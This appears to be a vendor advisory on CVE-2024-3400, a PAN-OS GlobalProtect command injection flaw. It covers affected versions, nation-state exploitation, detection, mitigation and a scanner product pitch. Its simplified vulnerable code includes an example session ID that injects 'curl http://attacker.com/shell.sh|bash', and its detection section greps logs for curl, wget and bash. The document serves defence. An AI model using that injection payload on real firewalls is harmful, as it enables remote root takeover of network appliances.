CVE-2024-3400: Palo Alto PAN-OS Command Injection — CVSS 10.0
CVE-2024-3400 is a maximum-severity OS command injection vulnerability in Palo Alto Networks PAN-OS GlobalProtect gateway. An unauthenticated attacker can execute arbitrary OS commands as root with no interaction required. Exploited by UTA0218 (likely state-sponsored) before disclosure.
| Attribute | Value |
|---|---|
| CVE ID | CVE-2024-3400 |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-77: OS Command Injection |
| Published | April 12, 2024 |
| Exploitation | Active — CISA KEV, nation-state exploitation |
What Is CVE-2024-3400?
CVE-2024-3400 affects the GlobalProtect feature of Palo Alto Networks PAN-OS. When GlobalProtect is configured as a gateway or portal, an unauthenticated remote attacker can inject arbitrary OS commands that execute with root privileges on the firewall appliance.
The combination of factors — no authentication required, network accessible, changed scope, maximum impact on confidentiality, integrity, and availability — yields a perfect CVSS 10.0 score. Among firewall vendors, only a handful of vulnerabilities have ever received this score.
🚨 Nation-State Exploitation Before Patch Availability
Volexity discovered this vulnerability while responding to an incident where UTA0218, a sophisticated threat actor, had deployed a novel Python backdoor called UPSTYLE on compromised PAN-OS devices. The attacker used the firewall as a pivot point to access internal networks, steal Active Directory credentials, and exfiltrate sensitive data. Volexity estimates exploitation began in late March 2024 — weeks before Palo Alto was notified.
Affected Systems
| PAN-OS Version | Affected (GlobalProtect enabled) | Fixed Version |
|---|---|---|
| PAN-OS 11.1 | < 11.1.2-h3 | 11.1.2-h3+ |
| PAN-OS 11.0 | < 11.0.4-h1 | 11.0.4-h1+ |
| PAN-OS 10.2 | < 10.2.9-h1 | 10.2.9-h1+ |
| PAN-OS 10.1 | < 10.1.14-h4 | 10.1.14-h4+ |
Prerequisite: GlobalProtect gateway or portal must be configured (show global-protect-gateway current-user returns results). Organizations that haven't configured GlobalProtect are not affected.
Technical Analysis
The injection point is in the GlobalProtect session handling code. When a GlobalProtect session is established, certain session attributes are written to temporary files on the firewall. The code that constructs the file path for these session files does not properly sanitize the session identifier, which is partially attacker-controlled.
# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"] # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}") # Command injection here
# Attacker crafts session ID containing shell metacharacters:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"
The UPSTYLE backdoor installed by UTA0218 used a novel persistence mechanism: a Python script that monitored web server access logs for specific request patterns (containing an encrypted command), executed the commands, and then restored the original file content to remove evidence of the activity.
Post-Exploitation Activity (UTA0218)
Volexity documented the following post-exploitation sequence from nation-state actors:
- UPSTYLE deployment: Python backdoor installed in the firewall web server path for persistent access
- Credential extraction: Firewall configuration dump containing VPN credentials and internal routing information
- Internal pivoting: Using the compromised firewall's trusted network position to reach internal hosts
- LDAP queries: Active Directory enumeration through the firewall's internal network access
- Data staging: Compression and exfiltration of sensitive files through the firewall
Detection
PAN-OS Log Analysis
# Check for UPSTYLE backdoor artifacts find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null # Suspicious traffic in GlobalProtect logs grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log # Modified system files (UPSTYLE modifies then restores) # Check for recent access times on web server files find /var/appweb -atime -7 -name "*.php" -o -name "*.py"
Threat Hunting Queries
- HTTP 200 responses to GlobalProtect paths with unusual session cookie formats
- Outbound connections from the firewall management plane to external IPs
- DNS queries from PAN-OS to domains not in the threat intelligence feed
- Unusual file modification timestamps on firewall configuration files
Mitigation
- Patch immediately: Apply hotfix versions listed above. This is a CVSS 10.0 with active exploitation — there is no acceptable delay.
- Threat Prevention interim workaround: For unpatched devices, enable Threat Prevention with security profiles on GlobalProtect interfaces. Palo Alto provided specific threat ID signatures.
- Disable GlobalProtect if not needed: Organizations not actively using GlobalProtect can temporarily disable the feature as a workaround.
- Audit firewall files: Run Palo Alto's provided script to check for UPSTYLE and other post-exploitation artifacts.
- Rotate all credentials: Any credentials stored in the firewall configuration (VPN certificates, LDAP bind credentials, etc.) must be considered compromised.
💡 CISA Emergency Directive: CISA issued Emergency Directive 24-03 requiring all US federal agencies to apply patches or mitigations by April 19, 2024. The urgency reflects the severity and active exploitation by sophisticated threat actors.
KENSAI Detection Capability
- PAN-OS fingerprinting: KENSAI identifies internet-facing Palo Alto devices and their PAN-OS versions, flagging CVE-2024-3400 vulnerable configurations
- GlobalProtect exposure detection: Identifies whether GlobalProtect gateway/portal is enabled on detected devices
- Safe exploitation confirmation: Non-destructive probe verifies exploitability without executing commands
- Compromise indicator scanning: Checks for UPSTYLE backdoor indicators in accessible web paths
- Continuous attack surface monitoring: Alerts on newly discovered PAN-OS devices joining your external attack surface
Is Your Palo Alto Infrastructure Exposed to CVE-2024-3400?
KENSAI instantly identifies internet-facing PAN-OS devices vulnerable to command injection. Don't wait for threat actors to find them first.
Scan Your Perimeter Now →